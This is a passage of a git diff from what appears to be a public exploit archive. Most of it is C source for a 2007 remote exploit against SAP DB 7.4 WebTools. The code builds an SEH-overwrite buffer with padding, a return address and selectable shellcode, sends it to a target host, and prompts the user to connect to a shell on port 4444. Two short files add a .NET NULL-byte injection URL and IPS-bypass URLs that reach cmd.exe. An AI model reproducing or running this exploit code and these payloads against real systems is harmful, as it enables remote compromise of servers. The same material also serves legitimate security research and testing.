WSACleanup(); + return -1; + } + } + if(remotehost == NULL) remotehost=default_remotehost; + memset(temp1,0,sizeof(temp1)); + memset(temp2,0,sizeof(temp2)); + memset(temp1, '\x20' , 58 - strlen(remotehost) -1); + printf(" # Host : %s%s# \n", remotehost, temp1); + sprintf(temp2, "%d", port); + memset(temp1,0,sizeof(temp1)); + memset(temp1, '\x20' , 58 - strlen(temp2) -1); + printf(" # Port : %s%s# \n", temp2, temp1); + memset(temp1,0,sizeof(temp1)); + memset(temp2,0,sizeof(temp2)); + sprintf(temp2, "%s", shellcodes[sh].name ); + memset(temp1, '\x20' , 58 - strlen(temp2) -1); + printf(" # Payload : %s%s# \n", temp2, temp1); + if(itarget!=-1) + { + 
memset(temp1,0,sizeof(temp1)); + memset(temp1, '\x20' , 58 - strlen(targets[itarget].t) -1); + printf(" # Target : %s%s# \n", targets[itarget].t, temp1); + }else + { + memset(temp1,0,sizeof(temp1)); + memset(temp1, '\x20' , 58 - strlen("Please select target") -1); + printf(" # Target : %s%s# \n", "Please select target", temp1); + } + printf(" # ------------------------------------------------------------------- # \n"); + fflush(stdout); + printf(" [+] Checking if server is online\n"); + fflush(stdout); + s=do_connect(remotehost, port); + if(s==-1) + { + printf(" [-] Server is OFFLINE\n"); + end_logo(); + return 0; + } + closesocket(s); + printf(" [+] Server is ONLINE\n"); + + + unsigned char buf[30000]; + memset(buf,0,sizeof(buf)); + fflush(stdout); + + make_buffer(buf, itarget, sh); + printf(" [+] Attacking buffer constructed\n"); + if(send_buffer(buf, remotehost,port)==-1) + { + printf(" [-] Cannot exploit server %s\n", remotehost); + end_logo(); + WSACleanup(); + return -1; + } + + printf(" [+] Buffer sent\n"); + printf(" [+] Connect to %s:%d\n", remotehost, 4444); + end_logo(); + WSACleanup(); + return 0; +} + + + +SOCKET do_connect (char *remotehost, int port) +{ + static struct hostent *host; + static struct sockaddr_in addr; + SOCKET s; + host = gethostbyname(remotehost); + if (!host) + { + perror("[-] gethostbyname() failed"); + return -1; + } + addr.sin_addr = *(struct in_addr*)host->h_addr; + + s = socket(PF_INET, SOCK_STREAM, 0); + if (s == -1) + { + closesocket(s); + perror("socket() failed"); + return -1; + } + + addr.sin_port = htons(port); + addr.sin_family = AF_INET; + + if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1) + { + closesocket(s); + return -1; + } + + return s; +} + + +void prepare_shellcode(unsigned char * fsh, unsigned int * fshlength, int sh) +{ + memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length); + *fshlength = shellcodes[sh].length; +} + +void make_buffer(unsigned char * buf, int itarget, int sh) +{ + // prepare 
shellcode + unsigned char fsh[10000]; + unsigned int fshlength; + memset(fsh, 0, sizeof(fsh)); + prepare_shellcode(fsh, &fshlength, sh); + // ----------------- + + // make buffer + unsigned char * cp=buf; + + // HTTP request + memcpy(cp, "GET /webdbm?Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE=", strlen("GET /webdbm?Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE=")); + cp +=strlen((char *)cp); + + // long request + memset(cp, 'A', 20774); + cp +=strlen((char *)cp); + + // jmp over 6 bytes + *cp++ = '\x90'; + *cp++ = '\x90'; + *cp++ = '\xEB'; + *cp++ = '\x06'; + + + // SEH handler + *cp++ = (char)((targets[itarget].ret ) & 0xff); + *cp++ = (char)((targets[itarget].ret >> 8) & 0xff); + *cp++ = (char)((targets[itarget].ret >> 16) & 0xff); + *cp++ = (char)((targets[itarget].ret >> 24) & 0xff); + + // jff + *cp++ = '\x90'; + *cp++ = '\x90'; + *cp++ = '\x90'; + *cp++ = '\x90'; + + // copy shellcode + memcpy(cp, fsh, fshlength); + cp+=fshlength; + + // end of HTTP request + memcpy(cp, " HTTP/1.0\r\n\r\n", strlen(" HTTP/1.0\r\n\r\n")); + cp +=strlen((char *)cp); + // ----------------- +} + + + +int send_buffer(unsigned char * buf, char * remotehost, int port) +{ + SOCKET sock; + int bytes; + + sock = do_connect(remotehost, port); + if(sock==-1) printf(" [-] Failed to connect to server\n"); + bytes = send(sock, (char *)buf, (int)strlen((char *)buf), 0); + if (bytes<0) printf(" [-] Failed to send the buffer\n"); else printf(" [+] Sent %d bytes\n", bytes); + closesocket(sock); + return 1; +} + + +// ----------------------------------------------------------------- +// XGetopt.cpp Version 1.2 +// ----------------------------------------------------------------- +int getopt(int argc, char *argv[], char *optstring) +{ + static char *next = NULL; + if (optind == 0) + next = NULL; + + optarg = NULL; + + if (next == NULL || *next == '\0') + { + if (optind == 0) + optind++; + + if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0') + { + optarg = NULL; + if 
(optind < argc) + optarg = argv[optind]; + return EOF; + } + + if (strcmp(argv[optind], "--") == 0) + { + optind++; + optarg = NULL; + if (optind < argc) + optarg = argv[optind]; + return EOF; + } + + next = argv[optind]; + next++; // skip past - + optind++; + } + + char c = *next++; + char *cp = strchr(optstring, c); + + if (cp == NULL || c == ':') + return '?'; + + cp++; + if (*cp == ':') + { + if (*next != '\0') + { + optarg = next; + next = NULL; + } + else if (optind < argc) + { + optarg = argv[optind]; + optind++; + } + else + { + return '?'; + } + } + + return c; +} +// ----------------------------------------------------------------- +// ----------------------------------------------------------------- +// ----------------------------------------------------------------- + + +void usage(char * s) +{ + printf(" Usage : %s -h -p -t \n", s); + printf(" Arguments:\n"); + printf(" -h host to connect\n"); + printf(" -p port (default: 9999)\n"); + printf(" -t target to attack\n"); + printf(" Shellcodes:\n"); + for(int i=0; shellcodes[i].name!=0;i++) + { + printf(" %d. %s\n",i+1,shellcodes[i].name); + } + printf("\n"); + printf(" Targets:\n"); + for(int j=0; targets[j].t!=0;j++) + { + printf(" %d. 
%s\n",j+1,targets[j].t); + } + printf("\n"); + end_logo(); +} + +void logo() +{ + printf("\n\n"); + printf(" ####################################################################### \n"); + printf(" # ____ __ _ ______ __ _____ #\n"); + printf(" # / __ \\________ _____/ /_(_)_________ / __/\\ \\/ / / _ / #\n"); + printf(" # / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___ / / \\ / / // / #\n"); + printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \\ / ___/ #\n"); + printf(" # /_____/_/ \\___/ \\_,_/\\__/_/\\___/\\__,_/ /_/ /_/\\_\\/_/ #\n"); + printf(" # crew #\n"); + printf(" ####################################################################### \n"); + printf(" # Exploit : SAP DB 7.4 WebTools Remote SEH overwrite exploit # \n"); + printf(" # Author : Heretic2 (heretic2x@gmail.com # \n"); + printf(" # Research: NGSSoftware Insight Security Research # \n"); + printf(" # Version : 1.0 Public Release # \n"); + printf(" # System : Windows 2000 ALL SP # \n"); + printf(" # Date : 07.07.2007 # \n"); + printf(" # ------------------------------------------------------------------- # \n"); +} + +void end_logo() +{ + printf(" # ------------------------------------------------------------------- # \n"); + printf(" # Dreatica-FXP crew [Heretic2] # \n"); + printf(" ####################################################################### \n\n"); +} + +// milw0rm.com [2007-07-07] \ No newline at end of file diff --git a/platforms/windows/remote/30281.txt b/platforms/windows/remote/30281.txt new file mode 100755 index 000000000..df51dcd3f --- /dev/null +++ b/platforms/windows/remote/30281.txt 
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/24791/info
+
+Microsoft .NET Framework is prone to multiple NULL-byte injection vulnerabilities because it fails to adequately sanitize user-supplied data.
+
+An attacker can exploit these issues to access sensitive information that may aid in further attacks; other attacks are also possible.
+
+http://www.example.com/[path]/somescript.asp%00
\ No newline at end of file
diff --git a/platforms/windows/remote/30287.txt b/platforms/windows/remote/30287.txt
new file mode 100755
index 000000000..85d0bf028
--- /dev/null
+++ b/platforms/windows/remote/30287.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24855/info
+
+TippingPoint IPS is prone to a detection-bypass vulnerability because the appliance fails to properly handle Unicode characters.
+
+A successful exploit of this issue may allow an attacker to bypass the filter and detection system of vulnerable appliances, allowing malicious URI traffic through. This will likely aid the attacker in further attacks.
+
+http://www.example.com/scripts%c0%afcmd.exe
+http://www.example.com/scripts%e0%80%afcmd.exe
+http://www.example.com/scripts%c1%9ccmd.exe
\ No newline at end of file